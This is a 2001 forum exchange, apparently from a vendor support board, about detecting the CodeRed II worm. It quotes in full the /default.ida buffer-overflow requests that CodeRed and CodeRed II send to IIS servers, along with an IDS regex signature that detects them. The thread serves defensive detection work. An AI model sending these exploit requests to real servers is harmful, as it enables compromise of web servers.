CodeRed II

rcrowe · ‎08-05-2001

i have just recieved notification via BUGTRAQ about the CodeRed II Worm. Just to be clear in this post I will refer to the CodeRed version 1 and version 2 as 'CodeRed' and I will refer to CodeRed II as 'CodeRed II'. (It is thought right now that they are 2 different worms, not the same) 'CodeRed' makes the request of /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3

%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a

HTTP/1.0

'CodeRed II' makes the request of /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3

%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a

HTTP/1.0

I have the string signature update for the original CodeRed. I am new to reading string signatures, so my question is: will the original string signature cisco released for 'CodeRed' work with 'CodeRed II' ?? Thanks.

mlhall · ‎08-05-2001

The second string posted by klwiley@cisco.com in this forum will detect this new worm.

The string:

"[/]default[.]ida[?][a-zA-Z0-9]+%u"

will match and fire for the "codered II" worm. Check the post from klwiley for more detailed information on what settings to use.